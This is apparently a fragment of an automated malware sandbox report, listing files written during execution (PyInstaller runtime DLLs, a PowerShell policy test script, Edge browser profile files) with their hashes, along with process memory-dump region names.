SHA256 752542f72af04b3837939f0113bfcb99858e86698998398b6cd0e4e5c3182fd5
SHA512 1bfb96d15df1cd3dcefc933aeca3ce59bef90e4575a66eaab92386f8e93652906626308886dd9b82c0863d1544331bbf99be8e781fa71d8c4c1f5fff294056dc

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-processthreads-l1-1-1.dll

MD5 e93816c04327730d41224e7a1ba6dc51
SHA1 3f83b9fc6291146e58afce5b5447cd6d2f32f749
SHA256 ca06ccf12927ca52d8827b3a36b23b6389c4c6d4706345e2d70b895b79ff2ec8
SHA512 beaab5a12bfc4498cdf67d8b560ef0b0e2451c5f4634b6c5780a857666fd14f8a379f42e38be1beefa1c3578b2df913d901b271719ac6794bfaab0731bb77bca

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-processthreads-l1-1-0.dll

MD5 2dd711ea0f97cb7c5ab98ae6f57b9439
SHA1 cba11e3eebe7b3d007eb16362785f5d1d1251acd
SHA256 a958fd20c06c90112e9e720047d84531b2bd0c77174660dc7e1f093a2ed3cc68
SHA512 d8d39ca07fdfed6a4e5686eae766022941c19bfbceb5972edd109b453fd130b627e3e2880f8580a8a41601493d0c800e64a76e8590070aa13c1abd550bd1a1ba

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 cc52cd91b1cbd20725080f1a5c215fcc
SHA1 2ce6a32a5bd6fa9096352d3d73e7b19b98e0cc49
SHA256 990dc7898fd7b442d50bc88fec624290d69f96030a1256385391b05658952508
SHA512 d262f62adde8a3d265650a4b56c866bdd2b660001fb2ca679d48ee389254e9ffa6ce9d69f2aaa619d22a155a5523dce5f7cfdd7638c0e9df1fe524b09520d5a3

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 0e5cd808e9f407e75f98bbb602a8df48
SHA1 285e1295a1cf91ef2306be5392190d8217b7a331
SHA256 1846947c10b57876239d8cb74923902454f50b347385277f5313d2a6a4e05a96
SHA512 7d8e35cabe7c3b963e6031cd73dc5ad5edf8b227df735888b28d8efb5744b531f0c84130e47624e4fea8ef700eabde20a4e2290a1688a6acffb6a09ca20d7085

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-memory-l1-1-0.dll

MD5 d39fbbeac429109849ec7e0dc1ec6b90
SHA1 2825c7aba7f3e88f7b3d3bc651bbc4772bb44ad0
SHA256 aeec3d48068137870e6e40bad9c9f38377aa06c6ea1ac288e9e02af9e8c28e6b
SHA512 b4197a4d19535e20ed2aff4f83aced44e56abbb99ce64e2f257d7f9b13882cbdb16d8d864f4923499241b8f7d504d78ff93f22b95f7b02996b15bb3da1a0ef42

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-localization-l1-2-0.dll

MD5 71457fd15de9e0b3ad83b4656cad2870
SHA1 c9c2caf4f9e87d32a93a52508561b4595617f09f
SHA256 db970725b36cc78ef2e756ff4b42db7b5b771bfd9d106486322cf037115bd911
SHA512 a10fcf1d7637effff0ae3e3b4291d54cc7444d985491e82b3f4e559fbb0dbb3b6231a8c689ff240a5036a7acae47421cda58aaa6938374d4b84893cce0077bc8

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 4334f1a7b180998473dc828d9a31e736
SHA1 4c0c14b5c52ab5cf43a170364c4eb20afc9b5dd4
SHA256 820e3acd26ad7a6177e732019492b33342bc9200fc3c0af812ebd41fb4f376cb
SHA512 7f2a12f9d41f3c55c4aff2c75eb6f327d9434269ebff3fbcc706d4961da10530c069720e81b1573faf919411f929304e4aaf2159205cf9a434b8833eea867aa9

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-interlocked-l1-1-0.dll

MD5 aff9165cff0fb1e49c64b9e1eaefdd86
SHA1 cdef56ab5734d10a08bc373c843abc144fe782cb
SHA256 159ecb50f14e3c247faec480a3e6e0cf498ec13039c988f962280187cee1391d
SHA512 64ddf8965defaf5e5ae336d37bdb3868538638bad927e2e76e06ace51a2bca60aefaab18c300bb7e705f470a937ad978edd0338091ad6bcc45564c41071eeb40

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-heap-l1-1-0.dll

MD5 405038fb22cd8f725c2867c9b4345b65
SHA1 385f0eb610fce082b56a90f1b10346c37c19d485
SHA256 1c1b88d403e2cde510741a840afa445603f76e542391547e6e4cc48958c02076
SHA512 b52752ac5d907dc442ec7c318998fd54ad9ad659bde4350493fe5ca95286ecefcbbbf82d718d4bf4e813b4d20a62cd1f7ba11ee7c68c49ec39307b7746968d18

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-handle-l1-1-0.dll

MD5 10f0c22c19d5bee226845cd4380b4791
SHA1 1e976a8256508452c59310ca5987db3027545f3d
SHA256 154ef0bf9b9b9daa08101e090aa9716f0fa25464c4ef5f49bc642619c7c16f0e
SHA512 3a5d3dc6448f65e1613e1a92e74f0934dd849433ceca593e7f974310cd96bf6ad6ccc3b0cb96bdb2dcc35514bc142c48cb1fd20fee0d8fa236999ad155fc518b

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-file-l2-1-0.dll

MD5 7f14fd0436c066a8b40e66386ceb55d0
SHA1 288c020fb12a4d8c65ed22a364b5eb8f4126a958
SHA256 c78eab8e057bddd55f998e72d8fdf5b53d9e9c8f67c8b404258e198eb2cdcf24
SHA512 d04adc52ee0ceed4131eb1d133bfe9a66cbc0f88900270b596116064480afe6ae6ca42feb0eaed54cb141987f2d7716bb2dae947a025014d05d7aa0b0821dc50

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-file-l1-2-0.dll

MD5 49e3260ae3f973608f4d4701eb97eb95
SHA1 097e7d56c3514a3c7dc17a9c54a8782c6d6c0a27
SHA256 476fbad616e20312efc943927ade1a830438a6bebb1dd1f83d2370e5343ea7af
SHA512 df22cf16490faa0dc809129ca32eaf1a16ec665f9c5411503ce0153270de038e5d3be1e0e49879a67043a688f6c42bdb5a9a6b3cea43bf533eba087e999be653

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-file-l1-1-0.dll

MD5 792c2b83bc4e0272785aa4f5f252ff07
SHA1 6868b82df48e2315e6235989185c8e13d039a87b
SHA256 d26d433f86223b10ccc55837c3e587fa374cd81efc24b6959435a6770addbf24
SHA512 72c99cff7fd5a762524e19abee5729dc8857f3ee3c8f78587625ec74f2ad96af7dee03aba54b441cda44b04721706bed70f3ad88453a341cbb51aac9afd9559e

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 0ffb34c0c2cdec47e063c5e0c96b9c3f
SHA1 9716643f727149b953f64b3e1eb6a9f2013eac9c
SHA256 863a07d702717cf818a842af0b4e1dfd6e723f712e49bf8c3af3589434a0ae80
SHA512 4311d582856d9c3cac2cdc6a9da2137df913bcf69041015fd272c2780f6ab850895deb69279a076376a2e6401c907cb23a3052960478a6cf4b566a20cce61bd1

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-debug-l1-1-0.dll

MD5 e485c1c5f33ad10eec96e2cdbddff3c7
SHA1 31f6ba9beca535f2fb7ffb755b7c5c87ac8d226c
SHA256 c734022b165b3ba6f8e28670c4190a65c66ec7ecc961811a6bdcd9c7745cac20
SHA512 599036d8fa2e916491bedb5bb49b94458a09dddd2908cf770e94bb0059730598ec5a9b0507e6a21209e2dcae4d74027313df87c9ab51fad66b1d07903bae0b35

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-datetime-l1-1-0.dll

MD5 a17d27e01478c17b88794fd0f79782fc
SHA1 2b8393e7b37fb990be2cdc82803ca49b4cef8546
SHA256 ac227773908836d54c8fc06c4b115f3bdfc82e4d63c7f84e1f8e6e70cd066339
SHA512 ddc6dda49d588f22c934026f55914b31e53079e044dec7b4f1409668dbfe8885b887cc64a411d44f83bc670ac8a8b6d3ad030d4774ef7bf522f1d3bc00e07485

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-console-l1-1-0.dll

MD5 71405f0ba5d7da5a5f915f33667786de
SHA1 bb5cdf9c12fe500251cf98f0970a47b78c2f8b52
SHA256 0099f17128d1551a47cbd39ce702d4acc4b49be1bb1cfe974fe5a42da01d88eb
SHA512 b2c6438541c4fa7af3f8a9606f64eeef5d77ddbc0689e7501074bb72b7cc907a8461a75089e5b70b881bc3b1be009888ff25ea866faaf1c49dd521027041295a

memory/2812-166-0x00007FF9E7970000-0x00007FF9E7994000-memory.dmp

memory/2812-214-0x00007FF9E7720000-0x00007FF9E774D000-memory.dmp

memory/2812-215-0x00007FF9E71E0000-0x00007FF9E71F9000-memory.dmp

memory/2812-216-0x00007FF9E71C0000-0x00007FF9E71DF000-memory.dmp

memory/2812-217-0x00007FF9D35C0000-0x00007FF9D3729000-memory.dmp

memory/2812-218-0x00007FF9E71A0000-0x00007FF9E71B9000-memory.dmp

memory/2812-219-0x00007FF9E7190000-0x00007FF9E719D000-memory.dmp

memory/2812-220-0x00007FF9E7160000-0x00007FF9E718E000-memory.dmp

memory/2812-221-0x00007FF9E6F50000-0x00007FF9E7008000-memory.dmp

memory/2812-222-0x00007FF9D3730000-0x00007FF9D3B9E000-memory.dmp

memory/2812-223-0x00007FF9D3240000-0x00007FF9D35B5000-memory.dmp

memory/2812-227-0x00007FF9E70E0000-0x00007FF9E70F4000-memory.dmp

memory/2812-225-0x00007FF9E7970000-0x00007FF9E7994000-memory.dmp

memory/2812-224-0x00000233F59A0000-0x00000233F5D15000-memory.dmp

memory/2812-228-0x00007FF9E6F40000-0x00007FF9E6F4D000-memory.dmp

memory/2812-229-0x00007FF9D67A0000-0x00007FF9D68B8000-memory.dmp

memory/2812-233-0x00007FF9E71E0000-0x00007FF9E71F9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_geo3w5tq.gq5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5124-243-0x000002CA1EF50000-0x000002CA1EF72000-memory.dmp

memory/5124-244-0x00007FF9D26C0000-0x00007FF9D3181000-memory.dmp

memory/5208-254-0x00007FF9D26C0000-0x00007FF9D3181000-memory.dmp

memory/5124-255-0x000002CA1F010000-0x000002CA1F020000-memory.dmp

memory/5208-256-0x000001E30A010000-0x000001E30A020000-memory.dmp

memory/5424-257-0x00007FF9D26C0000-0x00007FF9D3181000-memory.dmp

memory/5424-267-0x000002C30BAB0000-0x000002C30BAC0000-memory.dmp

memory/5424-268-0x000002C30BAB0000-0x000002C30BAC0000-memory.dmp

memory/5124-269-0x000002CA1F010000-0x000002CA1F020000-memory.dmp

memory/5124-271-0x000002CA1F010000-0x000002CA1F020000-memory.dmp

memory/5208-270-0x000001E30A010000-0x000001E30A020000-memory.dmp

memory/2812-273-0x00007FF9D35C0000-0x00007FF9D3729000-memory.dmp

memory/2812-272-0x00007FF9E71C0000-0x00007FF9E71DF000-memory.dmp

memory/5424-274-0x000002C30BAB0000-0x000002C30BAC0000-memory.dmp

memory/2812-275-0x00007FF9D3730000-0x00007FF9D3B9E000-memory.dmp

memory/2812-276-0x00007FF9E7970000-0x00007FF9E7994000-memory.dmp

memory/2812-277-0x00007FF9E7750000-0x00007FF9E775F000-memory.dmp

memory/2812-278-0x00007FF9E7720000-0x00007FF9E774D000-memory.dmp

memory/2812-280-0x00007FF9E71C0000-0x00007FF9E71DF000-memory.dmp

memory/2812-281-0x00007FF9D35C0000-0x00007FF9D3729000-memory.dmp

memory/2812-282-0x00007FF9E71A0000-0x00007FF9E71B9000-memory.dmp

memory/2812-279-0x00007FF9E71E0000-0x00007FF9E71F9000-memory.dmp

memory/2812-283-0x00007FF9E7190000-0x00007FF9E719D000-memory.dmp

memory/2812-285-0x00007FF9E6F50000-0x00007FF9E7008000-memory.dmp

memory/2812-284-0x00007FF9E7160000-0x00007FF9E718E000-memory.dmp

memory/2812-286-0x00007FF9E71A0000-0x00007FF9E71B9000-memory.dmp

memory/5124-288-0x000002CA1F010000-0x000002CA1F020000-memory.dmp

memory/5424-290-0x000002C30BAB0000-0x000002C30BAC0000-memory.dmp

memory/2812-291-0x00007FF9E6F40000-0x00007FF9E6F4D000-memory.dmp

memory/2812-292-0x00007FF9D67A0000-0x00007FF9D68B8000-memory.dmp

memory/2812-289-0x00007FF9E70E0000-0x00007FF9E70F4000-memory.dmp

memory/2812-287-0x00007FF9D3240000-0x00007FF9D35B5000-memory.dmp

memory/5208-299-0x00007FF9D26C0000-0x00007FF9D3181000-memory.dmp

memory/5424-298-0x00007FF9D26C0000-0x00007FF9D3181000-memory.dmp

memory/5124-297-0x00007FF9D26C0000-0x00007FF9D3181000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8f617469f14551ec2f74b794577b7e64
SHA1 c80b5a67da3eafeab3ec115ffbce20b347e782b7
SHA256 015ee954074fc1e18cfd057685902228dfd5e1a360f6f66ee5853d258c24a994
SHA512 e48dd348228e7e35820aa8a7ef27602c3bffc3acf175ec796c28c046a951c2a7ea8044b9a6c9202d1f510107041cb0527d033c1cdd866b9c605f0ff4e838d999

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0013384e7a88f717fb996a69a09bbb57
SHA1 071aac0d0734e82f5cca6e90f458f93e66182c39
SHA256 5509f6638df2c244769c3debe1c0bc5789e6218673b8be4a8cc2547b79b4ba82
SHA512 8078d6fb562470ca6e7f9309b1476892b1485f8478a326b576a66bc878f9aa2f13d6c1d23ccf55f85423d123787a6641ea3bb67904fa9635a1809911735be9b5

memory/5808-373-0x00007FF9D5730000-0x00007FF9D61F1000-memory.dmp

memory/5808-379-0x00000187A75F0000-0x00000187A7600000-memory.dmp

memory/5808-385-0x00000187A75F0000-0x00000187A7600000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 5e9b2fbeebf90f8f9d4c16c6477abe66
SHA1 83781415c834e9c5057c26616b438f94eacb6dc9
SHA256 9c14489adb24507dcf021697118adadd8a380fb80e441f2ec6fef5e3355a3e7e
SHA512 486ef2943b307498e292c2597dcaa504251563a54463abf7417d60db791409742ecdb56bb1a15e42f67b14de7985e7484efd4dc5c7be1c8a53a22b11cebe3e79

memory/5808-392-0x00000187A75F0000-0x00000187A7600000-memory.dmp

memory/5808-393-0x00007FF9D5730000-0x00007FF9D61F1000-memory.dmp

memory/4864-394-0x00007FF9D5730000-0x00007FF9D61F1000-memory.dmp

memory/4864-395-0x000001E985880000-0x000001E985890000-memory.dmp

memory/4864-396-0x000001E985880000-0x000001E985890000-memory.dmp

memory/4864-406-0x000001E985880000-0x000001E985890000-memory.dmp

memory/4864-407-0x000001E985880000-0x000001E985890000-memory.dmp

memory/4864-409-0x00007FF9D5730000-0x00007FF9D61F1000-memory.dmp

memory/1576-415-0x00007FF9D5730000-0x00007FF9D61F1000-memory.dmp

memory/1576-420-0x0000018777C60000-0x0000018777C70000-memory.dmp

memory/1576-421-0x0000018777C60000-0x0000018777C70000-memory.dmp

memory/1576-422-0x0000018777C60000-0x0000018777C70000-memory.dmp

memory/1576-423-0x0000018777C60000-0x0000018777C70000-memory.dmp

memory/1576-425-0x00007FF9D5730000-0x00007FF9D61F1000-memory.dmp